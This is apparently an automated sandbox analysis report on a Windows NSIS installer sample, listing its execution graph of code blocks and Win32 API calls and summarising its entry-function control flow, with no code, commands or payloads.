4148 402c58 4146->4148 4150 4059ff wsprintfW 4147->4150 4150->4148 4151 401a7b 4152 401a7d 4151->4152 4153 40145c 18 API calls 4152->4153 4154 401a82 4153->4154 4155 406559 72 API calls 4154->4155 4156 401a8b 4155->4156 4157 40447d GetDlgItem GetDlgItem 4158 4044d3 7 API calls 4157->4158 4163 4046eb 4157->4163 4159 404577 DeleteObject 4158->4159 4160 40456b SendMessageW 4158->4160 4161 404582 4159->4161 4160->4159 4164 4045b9 4161->4164 4166 4060ca 18 API calls 4161->4166 4162 4047d0 4165 404875 4162->4165 4175 40481f SendMessageW 4162->4175 4200 4046de 4162->4200 4163->4162 4173 40434f 5 API calls 4163->4173 4187 40475b 4163->4187 4169 4038c7 19 API calls 4164->4169 4167 40488a 4165->4167 4168 40487e SendMessageW 4165->4168 4171 40459b SendMessageW SendMessageW 4166->4171 4178 4048a3 4167->4178 4179 40489c ImageList_Destroy 4167->4179 4185 4048b3 4167->4185 4168->4167 4174 4045cd 4169->4174 4170 403952 8 API calls 4177 404a6c 4170->4177 4171->4161 4172 4047c2 SendMessageW 4172->4162 4173->4187 4180 4038c7 19 API calls 4174->4180 4176 404834 SendMessageW 4175->4176 4175->4200 4182 404847 4176->4182 4183 4048ac GlobalFree 4178->4183 4178->4185 4179->4178 4184 4045de 4180->4184 4181 404a1d 4186 404a32 ShowWindow GetDlgItem ShowWindow 4181->4186 4181->4200 4191 404858 SendMessageW 4182->4191 4183->4185 4188 4046ab GetWindowLongW SetWindowLongW 4184->4188 4194 40463a SendMessageW 4184->4194 4195 4046a5 4184->4195 4198 404668 SendMessageW 4184->4198 4199 40467c SendMessageW 4184->4199 4185->4181 4190 40141d 2 API calls 4185->4190 4202 4048e5 4185->4202 4186->4200 4187->4162 4187->4172 4189 4046c5 4188->4189 4192 4046e3 4189->4192 4193 4046cb ShowWindow 4189->4193 4190->4202 4191->4165 4209 403920 SendMessageW 4192->4209 4208 403920 SendMessageW 4193->4208 4194->4184 4195->4188 4195->4189 4198->4184 4199->4184 4200->4170 4201 4049f4 InvalidateRect 4201->4181 4203 404a0a 4201->4203 4204 404913 SendMessageW 4202->4204 4205 404929 4202->4205 4210 403f13 4203->4210 
4204->4205 4205->4201 4207 4049a2 SendMessageW SendMessageW 4205->4207 4207->4205 4208->4200 4209->4163 4211 403f33 4210->4211 4212 4060ca 18 API calls 4211->4212 4213 403f73 4212->4213 4214 4060ca 18 API calls 4213->4214 4215 403f7e 4214->4215 4216 4060ca 18 API calls 4215->4216 4217 403f8e lstrlenW wsprintfW SetDlgItemTextW 4216->4217 4217->4181 4218 40207d 4219 40145c 18 API calls 4218->4219 4220 402085 4219->4220 4221 405b98 2 API calls 4220->4221 4222 40208b 4221->4222 4223 40209a 4222->4223 4227 4059ff wsprintfW 4222->4227 4228 4059ff wsprintfW 4223->4228 4226 402c58 4227->4223 4228->4226 4229 4015fd 4230 401605 4229->4230 4231 404a73 25 API calls 4229->4231 4231->4230 4232 401ffe 4233 40145c 18 API calls 4232->4233 4234 402005 4233->4234 4235 404a73 25 API calls 4234->4235 4236 40200f 4235->4236 4237 4056ec 2 API calls 4236->4237 4238 402015 4237->4238 4239 401721 4238->4239 4240 402026 WaitForSingleObject 4238->4240 4244 402066 CloseHandle 4238->4244 4242 402038 4240->4242 4243 40204a GetExitCodeProcess 4242->4243 4246 405bf6 2 API calls 4242->4246 4243->4244 4245 40205d 4243->4245 4244->4239 4249 4059ff wsprintfW 4245->4249 4247 40203f WaitForSingleObject 4246->4247 4247->4242 4249->4244 4250 401000 4251 401037 BeginPaint GetClientRect 4250->4251 4252 40100c DefWindowProcW 4250->4252 4254 4010fc 4251->4254 4255 401182 4252->4255 4256 401073 CreateBrushIndirect FillRect DeleteObject 4254->4256 4257 401105 4254->4257 4256->4254 4258 401170 EndPaint 4257->4258 4259 40110b CreateFontIndirectW 4257->4259 4258->4255 4259->4258 4260 40111b 6 API calls 4259->4260 4260->4258 4261 401707 4262 40145c 18 API calls 4261->4262 4263 40170f SetFileAttributesW 4262->4263 4264 401721 4263->4264 4265 40400b 4266 40404c 4265->4266 4267 40403f 4265->4267 4269 404055 GetDlgItem 4266->4269 4274 4040b8 4266->4274 4326 405731 GetDlgItemTextW 4267->4326 4271 404069 4269->4271 4270 404046 4273 405ae7 5 API calls 4270->4273 4276 40407d SetWindowTextW 4271->4276 4281 405807 4 API 
calls 4271->4281 4272 40419f 4324 404334 4272->4324 4328 405731 GetDlgItemTextW 4272->4328 4273->4266 4274->4272 4277 4060ca 18 API calls 4274->4277 4274->4324 4279 4038c7 19 API calls 4276->4279 4283 404131 SHBrowseForFolderW 4277->4283 4278 4041cb 4284 406042 18 API calls 4278->4284 4285 40409b 4279->4285 4280 403952 8 API calls 4286 404348 4280->4286 4282 404073 4281->4282 4282->4276 4290 405fe6 3 API calls 4282->4290 4283->4272 4287 404149 CoTaskMemFree 4283->4287 4288 4041d1 4284->4288 4289 4038c7 19 API calls 4285->4289 4291 405fe6 3 API calls 4287->4291 4329 405ab8 lstrcpynW 4288->4329 4292 4040a9 4289->4292 4290->4276 4293 404156 4291->4293 4327 403920 SendMessageW 4292->4327 4296 40418d SetDlgItemTextW 4293->4296 4301 4060ca 18 API calls 4293->4301 4296->4272 4297 4040b1 4299 405bbf 3 API calls 4297->4299 4298 4041e8 4300 405bbf 3 API calls 4298->4300 4299->4274 4302 4041f0 4300->4302 4303 404175 lstrcmpiW 4301->4303 4304 404231 4302->4304 4311 406015 2 API calls 4302->4311 4313 404286 4302->4313 4303->4296 4306 404186 lstrcatW 4303->4306 4330 405ab8 lstrcpynW 4304->4330 4306->4296 4307 40423a 4308 405807 4 API calls 4307->4308 4309 404240 GetDiskFreeSpaceW 4308->4309 4312 404264 MulDiv 4309->4312 4309->4313 4311->4302 4312->4313 4314 4042e3 4313->4314 4316 403f13 21 API calls 4313->4316 4315 404306 4314->4315 4317 40141d 2 API calls 4314->4317 4331 40390d EnableWindow 4315->4331 4318 4042d4 4316->4318 4317->4315 4320 4042e5 SetDlgItemTextW 4318->4320 4321 4042d9 4318->4321 4320->4314 4323 403f13 21 API calls 4321->4323 4322 404322 4322->4324 4332 4038e9 4322->4332 4323->4314 4324->4280 4326->4270 4327->4297 4328->4278 4329->4298 4330->4307 4331->4322 4333 4038f7 4332->4333 4334 4038fc SendMessageW 4332->4334 4333->4334 4334->4324 3610 40188d 3611 40145c 18 API calls 3610->3611 3612 401895 SearchPathW 3611->3612 3613 4018b2 3612->3613 3633 40248e 3634 4024c0 3633->3634 3635 402494 3633->3635 3636 40145c 18 API calls 3634->3636 3646 40154d 3635->3646 3638 
4024c8 3636->3638 3650 401497 RegOpenKeyExW 3638->3650 3639 40249b 3642 40145c 18 API calls 3639->3642 3645 401721 3639->3645 3643 4024ad RegDeleteValueW RegCloseKey 3642->3643 3643->3645 3647 40155e 3646->3647 3648 40145c 18 API calls 3647->3648 3649 401585 RegOpenKeyExW 3648->3649 3649->3639 3657 4014c3 3650->3657 3658 40150f 3650->3658 3651 4014e9 RegEnumKeyW 3652 4014fb RegCloseKey 3651->3652 3651->3657 3654 405bbf 3 API calls 3652->3654 3653 401520 RegCloseKey 3653->3658 3656 40150b 3654->3656 3655 401497 3 API calls 3655->3657 3656->3658 3659 40153b RegDeleteKeyW 3656->3659 3657->3651 3657->3652 3657->3653 3657->3655 3658->3645 3659->3658 4335 401610 4336 40161b PostQuitMessage 4335->4336 4337 401605 4335->4337 4336->4337 4338 401a90 4339 40145c 18 API calls 4338->4339 4340 401a98 4339->4340 4341 40574d MessageBoxIndirectW 4340->4341 4342 401721 4341->4342 3151 403415 #17 SetErrorMode OleInitialize 3223 405bbf GetModuleHandleA 3151->3223 3155 403483 GetCommandLineW 3228 405ab8 lstrcpynW 3155->3228 3157 403495 GetModuleHandleW 3158 4034ad 3157->3158 3159 4057b3 CharNextW 3158->3159 3160 4034bc CharNextW 3159->3160 3174 4034ce 3160->3174 3161 403566 3162 403585 GetTempPathW 3161->3162 3229 403360 3162->3229 3164 40359b 3165 4035c3 DeleteFileW 3164->3165 3166 40359f GetWindowsDirectoryW lstrcatW 3164->3166 3237 40311b GetTickCount GetModuleFileNameW 3165->3237 3168 403360 11 API calls 3166->3168 3167 4057b3 CharNextW 3167->3174 3170 4035bb 3168->3170 3170->3165 3172 403650 3170->3172 3171 4035d7 3171->3172 3175 4057b3 CharNextW 3171->3175 3208 403640 3171->3208 3320 4033eb 3172->3320 3174->3161 3174->3167 3180 403568 3174->3180 3185 4035ee 3175->3185 3178 403756 3181 4037d9 3178->3181 3183 405bbf 3 API calls 3178->3183 3179 403669 3327 40574d 3179->3327 3331 405ab8 lstrcpynW 3180->3331 3187 403765 3183->3187 3188 403618 3185->3188 3189 40367f lstrcatW lstrcmpiW 3185->3189 3190 405bbf 3 API calls 3187->3190 3332 406042 3188->3332 3189->3172 3192 40369b 
CreateDirectoryW SetCurrentDirectoryW 3189->3192 3193 40376e 3190->3193 3194 4036b3 3192->3194 3195 4036be 3192->3195 3197 405bbf 3 API calls 3193->3197 3348 405ab8 lstrcpynW 3194->3348 3349 405ab8 lstrcpynW 3195->3349 3201 403777 3197->3201 3200 4036cc 3350 405ab8 lstrcpynW 3200->3350 3204 4037c5 ExitWindowsEx 3201->3204 3210 403785 GetCurrentProcess 3201->3210 3204->3181 3207 4037d2 3204->3207 3205 403635 3347 405ab8 lstrcpynW 3205->3347 3359 40141d 3207->3359 3265 4053f8 3208->3265 3212 403795 3210->3212 3211 4060ca 18 API calls 3213 4036f4 DeleteFileW 3211->3213 3212->3204 3214 403701 CopyFileW 3213->3214 3220 4036db 3213->3220 3214->3220 3215 40374a 3216 406526 42 API calls 3215->3216 3218 403751 3216->3218 3218->3172 3219 4060ca 18 API calls 3219->3220 3220->3211 3220->3215 3220->3219 3222 403735 CloseHandle 3220->3222 3351 406526 3220->3351 3356 4056ec CreateProcessW 3220->3356 3222->3220 3224 405be4 GetProcAddress 3223->3224 3225 405bd9 LoadLibraryA 3223->3225 3226 403458 SHGetFileInfoW 3224->3226 3225->3224 3225->3226 3227 405ab8 lstrcpynW 3226->3227 3227->3155 3228->3157 3230 405ae7 5 API calls 3229->3230 3232 40336c 3230->3232 3231 403376 3231->3164 3232->3231 3362 405fe6 lstrlenW CharPrevW 3232->3362 3235 40592d 2 API calls 3236 403392 3235->3236 3236->3164 3365 4058fe GetFileAttributesW CreateFileW 3237->3365 3239 40315b 3240 40316b 3239->3240 3366 405ab8 lstrcpynW 3239->3366 3240->3171 3242 403181 3367 406015 lstrlenW 3242->3367 3246 403192 GetFileSize 3247 4031a9 3246->3247 3262 40328e 3246->3262 3247->3240 3253 403351 3247->3253 3261 402e3a 6 API calls 3247->3261 3247->3262 3372 402e9e ReadFile 3247->3372 3249 403297 3249->3240 3251 4032d3 GlobalAlloc 3249->3251 3407 402ed0 SetFilePointer 3249->3407 3385 402ed0 SetFilePointer 3251->3385 3256 402e3a 6 API calls 3253->3256 3255 4032b4 3258 402e9e ReadFile 3255->3258 3256->3240 3257 4032ee 3386 402ee7 3257->3386 3260 4032bf 3258->3260 3260->3240 3260->3251 3261->3247 3374 402e3a 3262->3374 3263 4032fa 
3263->3240 3263->3263 3264 403328 SetFilePointer 3263->3264 3264->3240 3266 405bbf 3 API calls 3265->3266 3267 40540e 3266->3267 3268 405414 3267->3268 3269 405426 3267->3269 3433 4059ff wsprintfW 3268->3433 3270 405981 3 API calls 3269->3270 3271 405457 3270->3271 3273 405476 lstrcatW 3271->3273 3275 405981 3 API calls 3271->3275 3274 405424 3273->3274 3424 4039fc 3274->3424 3275->3273 3278 406042 18 API calls 3279 4054a7 3278->3279 3280 405543 3279->3280 3282 405981 3 API calls 3279->3282 3281 406042 18 API calls 3280->3281 3283 40554e 3281->3283 3284 4054d9 3282->3284 3285 40555e LoadImageW 3283->3285 3286 4060ca 18 API calls 3283->3286 3284->3280 3289 4054fe lstrlenW 3284->3289 3293 4057b3 CharNextW 3284->3293 3287 405613 3285->3287 3288 405589 RegisterClassW 3285->3288 3286->3285 3292 40141d 2 API calls 3287->3292 3290 40561d 3288->3290 3291 4055ce SystemParametersInfoW CreateWindowExW 3288->3291 3294 405532 3289->3294 3295 40550c lstrcmpiW 3289->3295 3290->3172 3291->3287 3296 405619 3292->3296 3297 4054f9 3293->3297 3299 405fe6 3 API calls 3294->3299 3295->3294 3298 40551c GetFileAttributesW 3295->3298 3296->3290 3302 4039fc 19 API calls 3296->3302 3297->3289 3301 405528 3298->3301 3300 405538 3299->3300 3434 405ab8 lstrcpynW 3300->3434 3301->3294 3305 406015 2 API calls 3301->3305 3303 40562a 3302->3303 3306 405636 ShowWindow LoadLibraryW 3303->3306 3307 4056bc 3303->3307 3305->3294 3308 405655 LoadLibraryW 3306->3308 3309 40565c GetClassInfoW 3306->3309 3435 404b48 OleInitialize 3307->3435 3308->3309 3311 405689 DialogBoxParamW 3309->3311 3312 40566f GetClassInfoW RegisterClassW 3309->3312 3314 40141d 2 API calls 3311->3314 3312->3311 3313 4056c2 3315 4056c6 3313->3315 3316 4056de 3313->3316 3318 4056b1 3314->3318 3315->3290 3319 40141d 2 API calls 3315->3319 3317 40141d 2 API calls 3316->3317 3317->3290 3318->3290 3319->3290 3321 403403 3320->3321 3322 4033f5 CloseHandle 3320->3322 3450 40380b 3321->3450 3322->3321 3328 405762 3327->3328 3329 403677 
ExitProcess 3328->3329 3330 405778 MessageBoxIndirectW 3328->3330 3330->3329 3331->3162 3502 405ab8 lstrcpynW 3332->3502 3334 406053 3503 405807 CharNextW CharNextW 3334->3503 3337 405ae7 5 API calls 3343 406069 3337->3343 3338 4060a2 lstrlenW 3339 4060a9 3338->3339 3338->3343 3341 405fe6 3 API calls 3339->3341 3340 405b98 2 API calls 3340->3343 3342 4060af GetFileAttributesW 3341->3342 3344 403626 3342->3344 3343->3338 3343->3340 3343->3344 3345 406015 2 API calls 3343->3345 3344->3172 3346 405ab8 lstrcpynW 3344->3346 3345->3338 3346->3205 3347->3208 3348->3195 3349->3200 3350->3220 3352 405bbf 3 API calls 3351->3352 3353 40652d 3352->3353 3355 40654e 3353->3355 3509 40635b lstrcpyW 3353->3509 3355->3220 3357 405727 3356->3357 3358 40571b CloseHandle 3356->3358 3357->3220 3358->3357 3360 40139b 2 API calls 3359->3360 3361 401432 3360->3361 3361->3181 3363 406003 lstrcatW 3362->3363 3364 40337e CreateDirectoryW 3362->3364 3363->3364 3364->3235 3365->3239 3366->3242 3368 406024 3367->3368 3369 403187 3368->3369 3370 40602a CharPrevW 3368->3370 3371 405ab8 lstrcpynW 3369->3371 3370->3368 3370->3369 3371->3246 3373 402ebf 3372->3373 3373->3247 3375 402e43 3374->3375 3376 402e5b 3374->3376 3377 402e53 3375->3377 3378 402e4c DestroyWindow 3375->3378 3379 402e63 3376->3379 3380 402e6b GetTickCount 3376->3380 3377->3249 3378->3377 3408 405bf6 3379->3408 3382 402e79 CreateDialogParamW ShowWindow 3380->3382 3383 402e9c 3380->3383 3382->3383 3383->3249 3385->3257 3387 402f02 3386->3387 3388 402f2f 3387->3388 3412 402ed0 SetFilePointer 3387->3412 3390 402e9e ReadFile 3388->3390 3391 402f3a 3390->3391 3392 402f53 GetTickCount 3391->3392 3393 4030ae 3391->3393 3399 402f3e 3391->3399 3396 402fa0 3392->3396 3392->3399 3394 4030b2 3393->3394 3395 4030d6 3393->3395 3397 402e9e ReadFile 3394->3397 3395->3399 3400 402e9e ReadFile 3395->3400 3401 4030f5 WriteFile 3395->3401 3398 402e9e ReadFile 3396->3398 3396->3399 3403 402ff2 GetTickCount 3396->3403 3404 403017 MulDiv wsprintfW 
3396->3404 3406 40305b WriteFile 3396->3406 3397->3399 3398->3396 3399->3263 3400->3395 3401->3399 3402 403109 3401->3402 3402->3395 3402->3399 3403->3396 3413 404a73 3404->3413 3406->3396 3406->3399 3407->3255 3409 405c13 PeekMessageW 3408->3409 3410 402e69 3409->3410 3411 405c09 DispatchMessageW 3409->3411 3410->3249 3411->3409 3412->3388 3414 404a8c 3413->3414 3423 404b30 3413->3423 3415 404aaa lstrlenW 3414->3415 3416 4060ca 18 API calls 3414->3416 3417 404ad3 3415->3417 3418 404ab8 lstrlenW 3415->3418 3416->3415 3420 404ae6 3417->3420 3421 404ad9 SetWindowTextW 3417->3421 3419 404aca lstrcatW 3418->3419 3418->3423 3419->3417 3422 404aec SendMessageW SendMessageW SendMessageW 3420->3422 3420->3423 3421->3420 3422->3423 3423->3396 3425 403a10 3424->3425 3442 4059ff wsprintfW 3425->3442 3427 403a84 3428 4060ca 18 API calls 3427->3428 3429 403a90 SetWindowTextW 3428->3429 3430 403aab 3429->3430 3431 403ac6 3430->3431 3432 4060ca 18 API calls 3430->3432 3431->3278 3432->3430 3433->3274 3434->3280 3443 403937 3435->3443 3437 404b92 3438 403937 SendMessageW 3437->3438 3440 404ba4 OleUninitialize 3438->3440 3439 404b6b 3439->3437 3446 40139b 3439->3446 3440->3313 3442->3427 3444 403940 SendMessageW 3443->3444 3445 40394f 3443->3445 3444->3445 3445->3439 3448 4013a2 3446->3448 3447 401410 3447->3439 3448->3447 3449 4013dd MulDiv SendMessageW 3448->3449 3449->3448 3452 403819 3450->3452 3451 403408 3454 406559 3451->3454 3452->3451 3453 40381e FreeLibrary GlobalFree 3452->3453 3453->3451 3453->3453 3455 406042 18 API calls 3454->3455 3456 40656c 3455->3456 3457 406577 DeleteFileW 3456->3457 3458 40658e 3456->3458 3488 403414 OleUninitialize 3457->3488 3459 4066df 3458->3459 3494 405ab8 lstrcpynW 3458->3494 3459->3488 3499 405b98 FindFirstFileW 3459->3499 3461 4065b6 3462 4065c2 lstrcatW 3461->3462 3463 4065cc 3461->3463 3464 4065d2 3462->3464 3465 406015 2 API calls 3463->3465 3467 4065e2 lstrcatW 3464->3467 3468 4065d8 3464->3468 3465->3464 3470 4065ea lstrlenW 
FindFirstFileW 3467->3470 3468->3467 3468->3470 3475 4066ce 3470->3475 3491 406611 3470->3491 3471 405fe6 3 API calls 3473 4066fb 3471->3473 3472 4057b3 CharNextW 3472->3491 3474 4058de 2 API calls 3473->3474 3476 406701 RemoveDirectoryW 3474->3476 3475->3459 3477 40672b 3476->3477 3478 40670c 3476->3478 3480 404a73 25 API calls 3477->3480 3482 404a73 25 API calls 3478->3482 3478->3488 3480->3488 3481 4066ab FindNextFileW 3483 4066c3 FindClose 3481->3483 3481->3491 3484 40671a 3482->3484 3483->3475 3485 406526 42 API calls 3484->3485 3485->3488 3487 406559 63 API calls 3487->3491 3488->3178 3488->3179 3490 404a73 25 API calls 3490->3481 3491->3472 3491->3481 3491->3487 3491->3490 3492 404a73 25 API calls 3491->3492 3493 406526 42 API calls 3491->3493 3495 405ab8 lstrcpynW 3491->3495 3496 4058de GetFileAttributesW 3491->3496 3492->3491 3493->3491 3494->3461 3495->3491 3497 4058fb DeleteFileW 3496->3497 3498 4058ed SetFileAttributesW 3496->3498 3497->3491 3498->3497 3500 405bb9 3499->3500 3501 405bae FindClose 3499->3501 3500->3471 3500->3488 3501->3500 3502->3334 3504 405824 3503->3504 3506 405836 3503->3506 3505 405831 CharNextW 3504->3505 3504->3506 3508 40585a 3505->3508 3507 4057b3 CharNextW 3506->3507 3506->3508 3507->3506 3508->3337 3508->3344 3510 406380 3509->3510 3511 4063a9 GetShortPathNameW 3509->3511 3535 4058fe GetFileAttributesW CreateFileW 3510->3535 3513 406520 3511->3513 3514 4063c2 3511->3514 3513->3355 3514->3513 3516 4063ca WideCharToMultiByte 3514->3516 3515 406389 CloseHandle GetShortPathNameW 3515->3513 3517 4063a1 3515->3517 3516->3513 3518 4063e7 WideCharToMultiByte 3516->3518 3517->3511 3517->3513 3518->3513 3519 4063ff wsprintfA 3518->3519 3520 4060ca 18 API calls 3519->3520 3521 40642b 3520->3521 3536 4058fe GetFileAttributesW CreateFileW 3521->3536 3523 406438 3523->3513 3524 406445 GetFileSize GlobalAlloc 3523->3524 3525 406516 CloseHandle 3524->3525 3526 406466 ReadFile 3524->3526 3525->3513 3526->3525 3527 406480 3526->3527 3527->3525 
3537 405864 lstrlenA 3527->3537 3530 406499 lstrcpyA 3533 4064bb 3530->3533 3531 4064ad 3532 405864 4 API calls 3531->3532 3532->3533 3534 4064ee SetFilePointer WriteFile GlobalFree 3533->3534 3534->3525 3535->3515 3536->3523 3538 4058a5 lstrlenA 3537->3538 3539 4058ad 3538->3539 3540 40587e lstrcmpiA 3538->3540 3539->3530 3539->3531 3540->3539 3541 40589c CharNextA 3540->3541 3541->3538 4343 402218 4344 40145c 18 API calls 4343->4344 4345 402220 4344->4345 4346 40145c 18 API calls 4345->4346 4347 40222b 4346->4347 4348 40145c 18 API calls 4347->4348 4349 402235 4348->4349 4350 40145c 18 API calls 4349->4350 4351 402240 4350->4351 4352 40145c 18 API calls 4351->4352 4354 40224b 4352->4354 4353 402260 CoCreateInstance 4356 402280 4353->4356 4354->4353 4355 40145c 18 API calls 4354->4355 4355->4353 4357 402c18 SendMessageW 4358 402c34 InvalidateRect 4357->4358 4359 402c58 4357->4359 4358->4359 3591 401f9b 3592 40145c 18 API calls 3591->3592 3593 401fa2 3592->3593 3594 40145c 18 API calls 3593->3594 3595 401fac 3594->3595 3596 40145c 18 API calls 3595->3596 3597 401fb7 3596->3597 3598 40145c 18 API calls 3597->3598 3599 401fc1 3598->3599 3603 401435 3599->3603 3602 401ff9 3604 404a73 25 API calls 3603->3604 3605 401443 ShellExecuteW 3604->3605 3605->3602 3606 40139b 3608 4013a2 3606->3608 3607 401410 3608->3607 3609 4013dd MulDiv SendMessageW 3608->3609 3609->3608 4360 401c1c 4361 401446 18 API calls 4360->4361 4362 401c26 4361->4362 4363 401446 18 API calls 4362->4363 4364 401c30 4363->4364 4367 4059ff wsprintfW 4364->4367 4366 402c58 4367->4366 4368 403c1f 4369 403c3a 4368->4369 4377 403d67 4368->4377 4373 403c74 4369->4373 4399 403b31 WideCharToMultiByte 4369->4399 4370 403dd2 4371 403ea4 4370->4371 4372 403ddc GetDlgItem 4370->4372 4378 403952 8 API calls 4371->4378 4374 403e65 4372->4374 4375 403df6 4372->4375 4380 4038c7 19 API calls 4373->4380 4374->4371 4383 403e77 4374->4383 4375->4374 4382 403e1c 6 API calls 4375->4382 4377->4370 4377->4371 4379 403da3 
GetDlgItem SendMessageW 4377->4379 4381 403e9f 4378->4381 4404 40390d EnableWindow 4379->4404 4385 403cb4 4380->4385 4382->4374 4387 403e8d 4383->4387 4388 403e7d SendMessageW 4383->4388 4386 4038c7 19 API calls 4385->4386 4390 403cc1 CheckDlgButton 4386->4390 4387->4381 4391 403e93 SendMessageW 4387->4391 4388->4387 4389 403dcd 4392 4038e9 SendMessageW 4389->4392 4402 40390d EnableWindow 4390->4402 4391->4381 4392->4370 4394 403cdf GetDlgItem 4403 403920 SendMessageW 4394->4403 4396 403cf5 SendMessageW 4397 403d12 GetSysColor 4396->4397 4398 403d1b SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4396->4398 4397->4398 4398->4381 4400 403b50 GlobalAlloc WideCharToMultiByte 4399->4400 4401 403b6e 4399->4401 4400->4401 4401->4373 4402->4394 4403->4396 4404->4389 4405 401ba0 4406 40145c 18 API calls 4405->4406 4407 401ba8 ExpandEnvironmentStringsW 4406->4407 4408 401bbb 4407->4408 4410 401bcd 4407->4410 4409 401bc1 lstrcmpW 4408->4409 4408->4410 4409->4410 4411 401822 4412 40145c 18 API calls 4411->4412 4413 401829 GetFullPathNameW 4412->4413 4416 401840 4413->4416 4420 401863 4413->4420 4414 402c58 4415 40187b GetShortPathNameW 4415->4414 4417 405b98 2 API calls 4416->4417 4416->4420 4418 401853 4417->4418 4418->4420 4421 405ab8 lstrcpynW 4418->4421 4420->4414 4420->4415 4421->4420 4422 401625 4423 40162b 4422->4423 4424 40139b 2 API calls 4423->4424 4425 401634 4424->4425 4426 401ca6 4427 40145c 18 API calls 4426->4427 4428 401cae 4427->4428 4429 401446 18 API calls 4428->4429 4430 401cb8 wsprintfW 4429->4430 4431 402c58 4430->4431 4432 4028ab 4433 401446 18 API calls 4432->4433 4435 4028b5 4433->4435 4434 402838 4435->4434 4436 4028ee ReadFile 4435->4436 4437 402946 4435->4437 4436->4434 4436->4435 4437->4434 4438 401446 18 API calls 4437->4438 4439 40298e 4438->4439 4440 402995 SetFilePointer 4439->4440 4440->4434 4441 4029a6 4440->4441 4443 4059ff wsprintfW 4441->4443 4443->4434 3614 40172d 3615 40145c 18 API calls 3614->3615 3616 401735 3615->3616 
Execution graph (tail of the edge listing; the rendered graph is not reproduced). Each node is a basic block in the 0x401000 code section labelled with the Win32 APIs it calls, and edges are the transitions between blocks. The blocks listed in this part cover directory handling (CharNextW, CreateDirectoryW, GetLastError, GetFileAttributesW, SetCurrentDirectoryW, lstrcpynW), file read/write with a delete-on-failure path (GetFileAttributesW, CreateFileW, GlobalAlloc, SetFilePointer, ReadFile, WriteFile, GlobalFree, CloseHandle, DeleteFileW), a version-info query (GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW, wsprintfW), FindClose, a timer with progress text (SetTimer, MulDiv, wsprintfW, SetWindowTextW, SetDlgItemTextW), dialog and popup-menu handling (GetDlgItem, CreateThread, CloseHandle, SendMessageW, ShowWindow, GetClientRect, GetSystemMetrics, CreatePopupMenu, AppendMenuW, GetWindowRect, TrackPopupMenu) with a copy-to-clipboard path (OpenClipboard, EmptyClipboard, GlobalAlloc, GlobalLock, GlobalUnlock, SetClipboardData, CloseClipboard), and an INI string read (GetPrivateProfileStringW, lstrcmpW).

                                              Control-flow Graph

                                              Function at 0x403415 (blocks 0x403415-0x4037e7; the rendered graph with its executed/not-executed colouring is not reproduced). Path summary from the block labels: #17 (COMCTL32), SetErrorMode, OleInitialize, import resolution through sub_405bbf, SHGetFileInfoW, GetCommandLineW, GetModuleHandleW; a command-line walk using CharNextW (sub_4057b3); GetTempPathW, falling back to GetWindowsDirectoryW plus lstrcatW; DeleteFileW and then the self-file header check in sub_40311b; on failure OleUninitialize and ExitProcess (via sub_40574d); otherwise lstrcatW and lstrcmpiW on the "~nsu.tmp" directory name, CreateDirectoryW, SetCurrentDirectoryW, DeleteFileW, CopyFileW and CloseHandle; at exit three further sub_405bbf resolutions, GetCurrentProcess (the function's string table also holds "SeShutdownPrivilege") and ExitWindowsEx.
                                              APIs
                                              • #17.COMCTL32 ref: 00403434
                                              • SetErrorMode.KERNELBASE(00008001), ref: 0040343F
                                              • OleInitialize.OLE32(00000000), ref: 00403446
                                                • Part of subcall function 00405BBF: GetModuleHandleA.KERNEL32(?,?,00000020,00403458,00000008), ref: 00405BCF
                                                • Part of subcall function 00405BBF: LoadLibraryA.KERNELBASE(?,?,00000020,00403458,00000008), ref: 00405BDA
                                                • Part of subcall function 00405BBF: GetProcAddress.KERNEL32(00000000,?), ref: 00405BEB
                                              • SHGetFileInfoW.SHELL32(0040856C,00000000,?,000002B4,00000000), ref: 0040346E
                                                • Part of subcall function 00405AB8: lstrcpynW.KERNEL32(?,?,00002004,00403483,004732A0,NSIS Error), ref: 00405AC5
                                              • GetCommandLineW.KERNEL32(004732A0,NSIS Error), ref: 00403483
                                              • GetModuleHandleW.KERNEL32(00000000,004CC0A0,00000000), ref: 00403496
                                              • CharNextW.USER32(00000000,004CC0A0,00000020), ref: 004034BD
                                              • GetTempPathW.KERNEL32(00002004,004E00C8,00000000,00000020), ref: 00403590
                                              • GetWindowsDirectoryW.KERNEL32(004E00C8,00001FFF), ref: 004035A5
                                              • lstrcatW.KERNEL32(004E00C8,\Temp), ref: 004035B1
                                              • DeleteFileW.KERNELBASE(004DC0C0), ref: 004035C8
                                              • OleUninitialize.OLE32(?), ref: 00403659
                                              • ExitProcess.KERNEL32 ref: 00403679
                                              • lstrcatW.KERNEL32(004E00C8,~nsu.tmp), ref: 00403685
                                              • lstrcmpiW.KERNEL32(004E00C8,004D80B8,004E00C8,~nsu.tmp), ref: 00403691
                                              • CreateDirectoryW.KERNEL32(004E00C8,00000000), ref: 0040369D
                                              • SetCurrentDirectoryW.KERNEL32(004E00C8), ref: 004036A4
                                              • DeleteFileW.KERNEL32(0043BD40,0043BD40,?,00480008,0040850C,0047C000,?), ref: 004036F5
                                              • CopyFileW.KERNEL32(004E80D8,0043BD40,00000001), ref: 00403709
                                              • CloseHandle.KERNEL32(00000000,0043BD40,0043BD40,?,0043BD40,00000000), ref: 00403736
                                              • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 0040378C
                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 004037C8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
